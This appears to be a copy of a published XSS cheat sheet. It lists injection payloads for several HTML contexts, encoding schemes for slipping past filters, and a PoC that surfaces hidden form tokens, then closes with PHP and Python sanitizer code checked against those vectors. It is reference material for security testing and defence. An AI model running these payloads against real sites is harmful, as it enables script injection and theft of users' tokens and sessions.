XSS Cheat Sheet link:
https://brutelogic.com.br/blog/wp-content/uploads/2021/09/Brute-XSS-Cheat-Sheet-Sample.pdf
1. Simple HTML Injection
Use when input lands outside a tag or inside an attribute's value, except in the cases described next.
<svg onload=alert(1)>
<script>alert(1)</script>
2. Simple HTML Injection – Attribute Breakout
Use when input lands inside an attribute's value of an HTML tag or outside a tag, except the ones described in the "Tag Block Breakout" case below.
"><svg onload=alert(1)>
"><script>alert(1)</script>
3. Simple HTML Injection – Comments Breakout
Use when input lands inside a comment section (between <!-- and -->) of the HTML document.
--><svg onload=alert(1)>
--><script>alert(1)</script>
4. Simple HTML Injection – Tag Block Breakout
Use when input lands inside or between the opening/closing of tags such as title, style, script, iframe, noscript and textarea, respectively.
</title><svg onload=alert(1)>
</style><svg onload=alert(1)>
</script><svg onload=alert(1)>
</iframe><svg onload=alert(1)>
</noscript><svg onload=alert(1)>
</textarea><svg onload=alert(1)>
5. HTML Injection - Inline
Use when input lands inside an attribute's value of an HTML tag but that tag can't be terminated by a greater-than sign (>).
"onmouseover="alert(1)
"onmouseover=alert(1)//
"autofocus onfocus="alert(1)
"autofocus onfocus=alert(1)//
6. HTML Injection - Vector Schemes
The following schemes show all chars and bytes allowed as separators or as valid syntax. "ENT" means HTML entity: any of the allowed chars or bytes can also be used in their HTML entity forms (named and numeric). Notice that the word "javascript" may or may not have bytes in between, and all of its characters can also be URL- or HTML-encoded.
Vector Scheme 1 (tag name + handler)
<svg[1]onload[2]=[3]alert(1)[4]>
[1]: SPACE, +, /, %09, %0A, %0C, %0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C, %0D, %20
[3]: SPACE, +, ", ', %09, %0A, %0B, %0C, %0D, %20, %22, %27
[4]: SPACE, +, ", ', %09, %0A, %0B, %0C, %0D, %20, %22, %27
Vector Scheme 2 (tag name + attribute + handler)
<img[1]src[2]=[3]k[4]onerror[5]=[6]alert(1)[7]>
[1]: SPACE, +, /, %09, %0A, %0C, %0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C, %0D, %20
[3]: SPACE, +, ", ', %09, %0A, %0C, %0D, %20, %22, %27
[4]: SPACE, +, ", ', %09, %0A, %0C, %0D, %20, %22, %27
[5]: SPACE, +, %09, %0A, %0C, %0D, %20
[6]: SPACE, +, ", ', %09, %0A, %0B, %0C, %0D, %20, %22, %27
[7]: SPACE, +, ", ', %09, %0A, %0B, %0C, %0D, %20, %22, %27
Vector Scheme 3 (tag name + href|src|data|action|formaction)
The [?], [4] and [5] fields can only be used if [3] and [6] are single or double quotes.
<a[1]href[2]=[3]javas[?]cript[4]:[5]alert(1)[6]>
[1]: SPACE, +, /, %09, %0A, %0C, %0D, %20, %2F
[2]: SPACE, +, %09, %0A, %0C, %0D, %20
[3]: SPACE, +, ", ', [%01 - %0F], [%10 - %1F], %20, %22, %27, ENT
[?]: %09, %0A, %0D, ENT
[4]: %09, %0A, %0D, ENT
[5]: SPACE, +, %09, %0A, %0B, %0C, %0D, %20
[6]: SPACE, +, ", ', %09, %0A, %0B, %0C, %0D, %20, %22, %27
7. Alternative PoC - Shake Your Body
Use to shake all the visible elements of the page, as a clear visualization of the vulnerability.
setInterval(k=>{b=document.body.style,b.marginTop=(b.marginTop=='4px')?'-4px':'4px';},5)
8. Alternative PoC - Alert Hidden Values
Use to prove that all hidden HTML values, like tokens and nonces in the target page, can be stolen.
f=document.forms;for(i=0;i<f.length;i++){e=f[i].elements;for(n in e){if(e[n].type=='hidden'){alert(e[n].name+': '+e[n].value)}}}
9. XSS Online Test Page
Use to practice XSS vectors and payloads. Check the source code for injection points.
https://brutelogic.com.br/gym.php
10. PHP Sanitizing for Source-based XSS
Use to prevent XSS in every context, as long as input does not reflect inside non-delimited strings or eval-like functions (both in JS context). It does not prevent DOM-based XSS; it sanitizes HTMLi (string breakout, markup and browser schemes) and JSi (string breakout and placeholders for template literals).
$input = preg_replace("/:|\\\$|\\\/", "", htmlentities($_REQUEST["param"], ENT_QUOTES));
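As an added example (not part of the cheat sheet), a Python port of the PHP sanitizer above, run against the vectors listed in the earlier sections to show that none of the breakout characters survive. It assumes html.escape(quote=True) stands in for htmlentities with ENT_QUOTES for the five characters that matter here.

```python
import html
import re

# Characters the PHP preg_replace removes after entity encoding.
_STRIP = re.compile(r"[:$\\]")

def sanitize(value: str) -> str:
    """Port of: preg_replace("/:|\\$|\\\\/", "", htmlentities($v, ENT_QUOTES))."""
    # Encode first, so an entity-encoded colon (&#58;) becomes &amp;#58; and is
    # no longer decoded to ':' by the browser inside an attribute.
    # Assumption: html.escape(quote=True) matches ENT_QUOTES for & < > " '.
    encoded = html.escape(value, quote=True)
    # Then drop the three characters the PHP regex removes:
    #   ':'  no URL scheme can form (javascript:, data:, ...)
    #   '$'  no template-literal placeholder ${...}
    #   '\'  no escape sequence inside a JS string literal
    return _STRIP.sub("", encoded)

# Raw characters that would still allow a breakout in the contexts covered above.
_BREAKOUT = set('<>"\'\\:$')

def remaining_breakout_chars(sanitized: str) -> set:
    """Return the raw breakout characters that survived (empty set = inert)."""
    return _BREAKOUT & set(sanitized)

# Constructed samples, taken from the vectors listed in sections 2 to 6.
SAMPLES = {
    "attribute breakout": '"><svg onload=alert(1)>',
    "comment breakout": "--><script>alert(1)</script>",
    "inline handler": '"autofocus onfocus=alert(1)//',
    "scheme with tab": "javas\tcript:alert(1)",
    "scheme with entity": "javas&#09;cript:alert(1)",
    "template literal": "${alert(1)}",
    "js string escape": "\\'-alert(1)//",
}

def run_samples() -> dict:
    """Sanitize every sample and return {name: sanitized output}."""
    return {name: sanitize(raw) for name, raw in SAMPLES.items()}

if __name__ == "__main__":
    for name, out in run_samples().items():
        left = remaining_breakout_chars(out)
        print(f"{name:20} -> {out!r}  leftover={sorted(left) or 'none'}")
```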